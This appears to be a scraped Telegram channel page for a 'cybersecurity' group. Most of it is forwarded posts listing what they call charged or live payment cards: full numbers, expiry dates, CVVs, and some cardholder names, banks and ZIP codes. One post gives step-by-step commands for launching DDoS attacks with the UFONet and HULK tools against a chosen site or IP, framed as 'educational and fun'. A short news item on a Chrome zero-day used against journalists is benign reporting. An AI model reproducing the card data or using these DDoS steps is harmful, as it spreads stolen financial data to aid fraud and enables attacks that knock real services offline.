Freelearningtech
726 subscribers
296 photos
45 videos
163 files
1.21K links
Freelearningtech Is A Platform For Cybersecurity (Hacking), Networking, Digital Marketing, IT Courses... And Many More.

https://linktr.ee/freelearningtech

 
Download Telegram
Forwarded from 𝙇𝙄𝙑𝙀 𝘾𝘾'𝙨 || [LIVE CC]:
CHARGED CC: 6011499465615795|01|2030|668
➤ Response: $1 Charged
➤ Receipt : HERE
CHARGED CC:
6011499460506049|03d|2023|895
➤ Response: $1 Charged
➤ Receipt : HERE
CHARGED CC:
6011499463778827|06|2033|580
➤ Response: $1 Charged
➤ Receipt : HERE
CHARGED CC:
6011499401636871|05|26|225
➤ Response: $1 Charged
➤ Receipt : HERE


FOR MORE @FreeProAccounTzTG
👍1🤯1
Forwarded from 𝙇𝙄𝙑𝙀 𝘾𝘾'𝙨 || [LIVE CC]:
➤ Receipt : Here
CHARGED CC: 5314620057356771|04|2024|338
➤ Response: $1 Charged
➤ Receipt : Here
CHARGED CC: 5314620057302601|03|2025|642
➤ Response: $1 Charged
➤ Receipt : Here
CHARGED CC: 5314620057250727|11|2027|877
➤ Response: $1 Charged
➤ Receipt : Here
CHARGED CC: 5314620057574662|09|2026|755
➤ Response: $1 Charged
➤ Receipt : Here
CHARGED CC: 5314620057150455|10|2025|450
➤ Response: $1 Charged
➤ Receipt : Here
CHARGED CC: 5314620057731007|12|2025|842
➤ Response: $1 Charged
➤ Receipt : Here
CHARGED CC: 5314620057600830|06|2026|520
➤ Response: $1 Charged
➤ Receipt : Here
CHARGED CC: 5314620054067017|10|2026|415
➤ Response: $1 Charged
➤ Receipt : Here
CHARGED CC: 5314620042400312|06|2026|854
➤ Response: $1 Charged
➤ Receipt : Here
CHARGED CC: 5314620051405210|06|2025|994
➤ Response: $1 Charged
➤ Receipt : Here
CHARGED CC: 5314620051426588|08|2025|244
➤ Response: $1 Charged
➤ Receipt : Here
CHARGED CC: 5314620051382427|09|2025|262
➤ Response: $1 Charged
➤ Receipt : Here
CHARGED CC: 5314620051870124|08|2025|841
➤ Response: $1 Charged
➤ Receipt : Here
👍1
HOW TO PERFORM DDOS ATTACK AS YOU'RE DOING IT VIA BOTNET

Do this only on Linux distr.:

apt update && apt upgrade
git clone https://github.com/epsylon/ufonet.git
cd ufonet
pip3 install GeoIP
pip3 install python-geoip
pip3 install pygeoip
pip3 install requests
pip3 install pycrypto
pip3 install pycurl
pip3 install whois
pip3 install scapy-python3
chmod + x setup.py
chmod + x ufonet
python3 ufonet --download-zombies
python3 ufonet -i sitehere

⚠️This is for educational and fun purposes only
DDoS is Denial of Services attack which we use to take down any Website, Server, Victime's IP.
pkg upgrade
pkg update
pkg install git.       
pkg install python2
git clone https://github.com/ujjawalsaini3/hulk
cd hulk
chmod +x * hulk.py
python2 hulk.py
python2 hulk.py http:// <target IP> and hit Enter
hulk started...

How to find a website IP
open New tab/session
apt install nslookup
nslookup example.com

Copy paste the IP address
👍1
Forwarded from 𝙇𝙄𝙑𝙀 𝘾𝘾'𝙨 || [LIVE CC]:
⋊Response: $1 Charged CHARGED CC: 5117950003464471|08|2023|885
⋊Response: $1 Charged CHARGED CC:
5117950003432437|08|2023|333
⋊Response: $1 Charged CHARGED CC:
5117950003484305|08|2023|674
⋊Response: $1 Charged CHARGED CC:
5117950003471435|08|2023|553
⋊Response: $1 Charged CHARGED CC:
5117950003406845|08|2023|845
⋊Response: $1 Charged CHARGED CC:
5117950003410235|08|2023|583
⋊Response: $1 Charged CHARGED CC:
5117950003401713|08|2023|354
⋊Response: $1 Charged CHARGED CC:
5117950003458176|08|2023|355
⋊Response: $1 Charged CHARGED CC:
5117950003478547|08|2023|235
⋊Response: $1 Charged CHARGED CC:
5117950003487365|08|2023|772
⋊Response: $1 Charged CHARGED CC:
5117950003403487|08|2023|857
⋊Response: $1 Charged CHARGED CC:
5117950003408403|08|2023|808
⋊Response: $1 Charged CHARGED CC:
5117950003464711|08|2023|843
⋊Response: $1 Charged CHARGED CC:
5117950003488322|08|2023|454
⋊Response: $1 Charged CHARGED CC:
5117950003432221|08|2023|073
⋊Response: $1 Charged CHARGED CC:
5117950003470775|08|2023|502
👍1
Forwarded from 𝙇𝙄𝙑𝙀 𝘾𝘾'𝙨 || [LIVE CC]:
⋊Response: $1 Charged
CHARGED CC:
5313640049905551|02|2028|460
⋊Response: $1 Charged
CHARGED CC:
5313640066468301|04|2024|189
⋊Response: $1 Charged
CHARGED CC:
5313640060753377|08|2022|649
⋊Response: $1 Charged
CHARGED CC:
5313640058240494|10|2029|350
⋊Response: $1 Charged
CHARGED CC:
5313640045756354|12|2023|241
⋊Response: $1 Charged
CHARGED CC:
5313640034008767|10|2026|093
⋊Response: $1 Charged
CHARGED CC:
5313640078968082|09|2022|095
⋊Response: $1 Charged
CHARGED CC:
5313640032362729|04|2028|089
⋊Response: $1 Charged
CHARGED CC:
5313640052264342|08|2025|034
⋊Response: $1 Charged
CHARGED CC:
5313640049004058|10|2027|405
⋊Response: $1 Charged
CHARGED CC:
5313640022692002|11|2025|418
⋊Response: $1 Charged
CHARGED CC:
5313640039697416|10|2027|177
⋊Response: $1 Charged
CHARGED CC:
5313640054352103|07|2029|721
⋊Response: $1 Charged
CHARGED CC:
5313640078375056|03|2028|938
⋊Response: $1 Charged
CHARGED CC:
5313640073513305|10|2022|655
⋊Response: $1 Charged
CHARGED CC:
4762231720912915|01|2023|303
⋊Response: $1 Charged
CHARGED CC:
5313640043275993|10|2028|143
⋊Response: $1 Charged
CHARGED CC:
5313640041590856|05|2029|196
⋊Response: $1 Charged
CHARGED CC:
5313640074683883|07|2027|432
⋊Response: $1 Charged
CHARGED CC:
5313640050329360|11|2029|622
⋊Response: $1 Charged
CHARGED CC: 5313640038198424|12|2027|099
⋊Response: $1 Charged
CHARGED CC: 5313640046680421|02|2023|673
⋊Response: $1 Charged
CHARGED CC: 5313640048695542|05|2029|616
⋊Response: $1 Charged
CHARGED CC: 5313640061910265|12|2024|493
⋊Response: $1 Charged
CHARGED CC: 5313640065896965|12|2027|485
⋊Response: $1 Charged
CHARGED CC: 5313640034579320|10|2029|142
⋊Response: $1 Charged
CHARGED CC: 5313640044461543|02|2025|929
⋊Response: $1 Charged
CHARGED CC: 5313640039200617|10|2026|229
⋊Response: $1 Charged
CHARGED CC: 5313640058546239|06|2027|131
⋊Response: $1 Charged
CHARGED CC: 5313640031479482|04|2023|376
⋊Response: $1 Charged
CHARGED CC: 5313640022393254|11|2023|622
⋊Response: $1 Charged
CHARGED CC: 5313640049031507|06|2029|637
⋊Response: $1 Charged
CHARGED CC: 5313640067598593|05|2026|459
⋊Response: $1 Charged
CHARGED CC: 5313640049459518|03|2027|898
⋊Response: $1 Charged
CHARGED CC: 5313640077325672|03|2023|144
⋊Response: $1 Charged
CHARGED CC: 5313640024618757|11|2027|984
⋊Response: $1 Charged
😃Get Free .XYZ .DEV .APP Domain 1 Year😱😱

🔗 | Link :
https://shareus.in/?i=2HsyKf
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
➤ | Sᴇɴᴅ Sᴄʀᴇᴇɴsʜᴏᴛ :
@SIR_AYUSH_BOT
➤ | Pʀᴏᴏғs Hᴇʀᴇ :
@HELL_PROOFS
Forwarded from 𝙇𝙄𝙑𝙀 𝘾𝘾'𝙨 || [LIVE CC]:
CCNUM 4520010051711077
EXP 22/10
NAME Dalia Di Michele
CVV 864

CCNUM
5356664244846764
EXP 25/12
NAME Mr Tom Sharp
CVV 736

CCNUM
4334436956297589
EXP 24/11
CVV 544

CCNUM
4334433239396981
EXP 24/07
CVV 409

CCNUM
5356668054963957
EXP 25/06
NAME Libby Thompson
CVV 468
👍1
Forwarded from 𝙇𝙄𝙑𝙀 𝘾𝘾'𝙨 || [LIVE CC]:
5129935017534118
EXP 24/06
CVV 003
Write your comment here Max 250 chars
Save comment
COUNTRY UNITED STATES
BANK SANTANDER BANK, NA
LEVEL ENHANCED
TYPE DEBIT
ZIP 03060
STATE New Hampshire

5311063467325842
EXP 24/02
NAME Christine M Santiago
CVV 178
Write your comment here Max 250 chars
Save comment
COUNTRY UNITED STATES
BANK BANCORP BANK, THE
LEVEL PREPAID RELOADABLE
TYPE DEBIT
ZIP 03060
STATE New Hampshire

SPAM
@LIVEE_CC_CARD
Forwarded from 𝙇𝙄𝙑𝙀 𝘾𝘾'𝙨 || [LIVE CC]:
CVV CC: 379223082401002|06|2023|8038
Result: CVV LIVE
CVV CC:
371782641362011|02|27|3822
Result: CVV LIVE
CVV CC:
371782641362011|02|2027|3822
Result: CVV LIVE
*🔰Chrome Zero-day Abused to Spread Spyware to Target Journalists*🔰

The spyware vendor from Israel, Candiru, was discovered abusing a zero-day vulnerability in Google Chrome to spy on journalists and high-interest individuals from the Middle East, using a spyware called DevilsTongue.


*The abuse of zero-day*

Avast researchers spotted the vulnerability and reported it to Google. Further, they disclosed the details after examining DevilsTongue attacks on their clients.
Candiru started abusing the zero-day in March and targeting users in Palestine, Turkey, Yemen, and Lebanon.
The flaw, tracked as CVE-2022-2294, is a high-severity heap-based buffer overflow in WebRTC. Its successful exploitation may lead to code execution on the targeted device.
After being reported to Google, the tech firm patched the exploited zero-day on July 4, which has been under active exploitation in cyberattacks.

Since the bug exists in WebRTC, it also impacts Safari browser but the exploit found only work on Windows.

*Attack vectors*

The spyware operators have used watering holes and spear-phishing tactics in their attacks.
This attack requires no interaction with the victim, such as clicking on a link or downloading a file.
Instead, a user is made to open an already compromised website or the one created by hackers in a Chromium-based browser or Chrome.
In one instance, the attackers infected a website used by a news agency in Lebanon and inserted JavaScript snippets to enable XSS attacks, and redirected targets to the exploit server.
In the Lebanon case, the zero-day allowed shellcode execution inside a renderer process and further chained with a sandbox escape flaw that Avast failed to recover for investigation.

*What was the target?*

After the initial infection, the DevilsTongue spyware used a BYOVD (bring your own driver) step to elevate the privileges and achieve read and write rights to the infected device's memory. Researchers believe the cybercriminals used the spyware to learn about what news stories the targeted journalist are working on.

*Conclusion*

The recent report sheds light on the dangers of services offered by commercial spyware vendors. These vendors are developing or buying zero-day exploits to target people asked by their clients. Thus, always protect data with powerful encryption and update devices with the latest security updates.
Forwarded from 𝙇𝙄𝙑𝙀 𝘾𝘾'𝙨 || [LIVE CC]:
CHARGED CC: 5262053008837693|09|2027|508
➜Response: Charged
CHARGED CC:
5262053008837669|03|2031|520
➜Response: Charged
CHARGED CC:
5262053008837552|05|2023|757
➜Response: Charged
CHARGED CC:
5262053008838816|11|2031|748
➜Response: Charged
CHARGED CC:
5262053008834708|07|2031|625
➜Response: Charged
CHARGED CC:
5262053008837693|05|2025|241
➜Response: Charged
CHARGED CC:
5262053008836240|01|2025|832
➜Response: Charged
CHARGED CC:
5262053008836141|11|2029|430
➜Response: Charged